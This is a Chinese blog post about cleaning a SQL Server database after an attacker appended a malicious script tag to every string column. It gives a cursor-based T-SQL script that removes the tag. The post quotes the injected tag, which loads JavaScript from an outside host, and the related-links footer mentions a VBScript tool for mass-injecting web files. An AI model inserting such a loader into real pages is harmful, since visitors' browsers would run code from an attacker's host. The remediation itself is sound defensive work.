数据库被挂马、sql批量修改

最新推荐文章于 2024-08-06 10:07:20 发布
最新推荐文章于 2024-08-06 10:07:20 发布
阅读量139 收藏
点赞数
分类专栏: SQL 文章标签: SQL C C++ C# Go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iteye_11863/article/details/81767856
版权

公司网站突然遭挂马,检查程序没一点问题,最后才发现数据库里只要是字符串类型的列都被追加了<script src=http://8f8el3l.cn/0.js></script>木马代码导致网站部分功能无法正常运行,可以使用以下代码来一键删除木马代码。

use test--你的数据库
go
declare @t varchar(255),@c varchar(255),@str1 varchar(8000),@str2 varchar(500),@str3 varchar(500)
declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b ,systypes c
where a.id=b.id and a.xtype='u' and c.name in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext')

--这里随便选择一个表里的一列类型为字符类型
set @str1 = (select top 1 UserName from [User])
--获得要替换的字符(木马代码)
set @str2 = (substring (@str1,charindex ('<script src=http://', @str1),500))
--如果你知道是什么木马代码可以直接定义
--set @str2='<script src=http://8f8el3l.cn/0.js></script>' 
set @str3=''--替换后的字符

open table_cursor
fetch next from table_cursor into @t,@c while(@@fetch_status=0)
begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str2+''','''+ @str3 +''')')
fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;
go
--测试
select * from [User]

 

iteye_11863
关注
专栏目录
批量替换sqlserver数据库TEXT字段类型的数据
追求卓越
06-14 1352
在申请百度推广账户的时候,百度需要审查旅游网站不能含有机票两个字,所以需要在旅游线路中批量替换掉机票2个字。 替换示例如下:   --创建数据测试环境 create table #tb(L_TEXT Ntext) insert into #tb  select 'abc123机票abc123,asd' --定义替换的字符串 declare @s_str var
SQL修改表的列
duimeng的博客
08-11 4573
SQL
SQLServer 2008 批量修改字段类型.sql
09-15
SQL Server 2008 批量修改字段类型,查询出所有需要修改的字段,然后修改
SQLServer批量修改所有表中的字段类型
最新发布
idongit的博客
08-06 175
【代码】SQLServer批量修改所有表中的字段类型。
批量生成修改数据库表字段类型SQL脚本
zjfjifei2008的专栏
11-23 1406
select  'alter table '+ b.name +' alter column ' + a.name + ' decimal(18,6)' from sys.columns a  join sys.objects b on b.object_id=a.object_id where a.user_type_id=106
如何批量修改mysql数据库表的字段类型 sql语句
beiback的博客
06-05 3434
sql其中,table_name为需要修改字段类型的表名,column1_name, column2_name, column3_name 等为需要修改数据类型的列名,new_data_type1, new_data_type2, new_data_type3 等为对应列名的新数据类型
数据库中的内容字段被的替换方法 SQL注入
12-15
在本文中,我们将讨论如何处理数据库内容字段被(即植入恶意代码)的情况,特别关注SQL Server环境。 【处理方法】 1. **数据备份**:在进行任何数据清理操作之前,务必先备份数据库。这样,如果在清理过程中...
批量替换sqlserver数据库字段并防范sql注入攻击的代码
09-11
### 批量替换SQL Server数据库字段并防范SQL注入攻击 #### 一、背景介绍 在日常的网站运营过程中,数据库的安全性至关重要。当网站的SQL Server数据库遭受恶意时,会对用户数据造成严重威胁,同时也可能...
数据库修复语句.txt
07-18
本文将深入分析一份名为“数据库修复语句.txt”的文本内容,从中提取出关键知识点,并详细介绍如何通过SQL语句对被数据库进行修复。 #### 二、理解现象与危害 行为不仅能够使攻击者获取数据库中...
MySQL批量修改字段数据类型
Win_Dan的博客
06-16 3636
问题 有一张表RULE,里面有120个以JE开头的字段,类型为tinytext,发现字段长度不够,需要修改成text类型。 1.查出所需要的列名 SELECT COLUMN_NAME, DATA_TYPE, COLUMN_COMMENT FROM information_schema.COLUMNS WHERE table_name = '表名' AND table_schema = '数据库名' 表名修改为RULE,数据库修改为glb,添加条件查出JE开头的字段 SELECT C
批量修改数据库中字段的数据类型
newsxy的专栏
04-29 3452
在有些时候,需要将某种数据类型的字段,修改为另一种数据类型,可使用下列脚本实现;例如:原来定义为decimal(18,2)类型的所有统一修改为decimal(19,4)。 – 关闭 约束 declare tb cursor for SELECT sql=’alter table [‘+d.name+’] NOCHECK CONSTRAINT all’ FROM
批量修改表中数据类型
pilitianshi1262的博客
09-20 2661
批量修改表中数据类型 需求:把数据库中所有’varchar’,‘char’类型修改成’nvarchar’,'nchar’类型,不可能一个一个去修改,在网上查找相关资料,整合成如下脚本。 思路:查询出所有要修改的字段,构造修改脚本,如果字段为约束或索引,则不允许修改,需先删除约束索引,执行修改脚本,然后再创建约束和索引。 --游标 declare AlterColumn cursor for --...
数据库技巧-批量修改ORACLE数据库的字段类型
itas109的专栏
01-30 2810
数据库技巧-批量修改ORACLE数据库的字段类型 如需转载请标明出处:http://blog.csdn.net/itas109 QQ技术交流群:12951803 使用工具: Navicat 11.2.7 1.新建过程函数 2.输入过程函数代码 这里的示例代码是将DATE类型的数据转换为TIMESTAMP类型。 注意: t.OWNER和t.DATA_TYPE更换为
sql批量修改数据
weixin_43167662的博客
04-06 7358
123113
SQL SERVER 批量修改字段的数据类型
zhoen的专栏
06-25 6037
create   procedure   p_set     as     declare   tb   cursor   for     SELECT   sql='alter   table   ['+d.name     +']   alter   column   ['+a.name+']   '     +b.name+'(8,3)'     FROM syscolumns a left   join   systypes   b   on   a.xtype=b.xusert
VBScript批量脚本分享与解析
"该资源提供的是两个使用VBScript(VBS)编写的脚本,用于批量在指定的Web目录下。脚本作者为BanLG,主要目标是将恶意代码插入到一系列常见的网页文件中,例如PHP、ASP、HTML等。" 详细解释: 批量是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值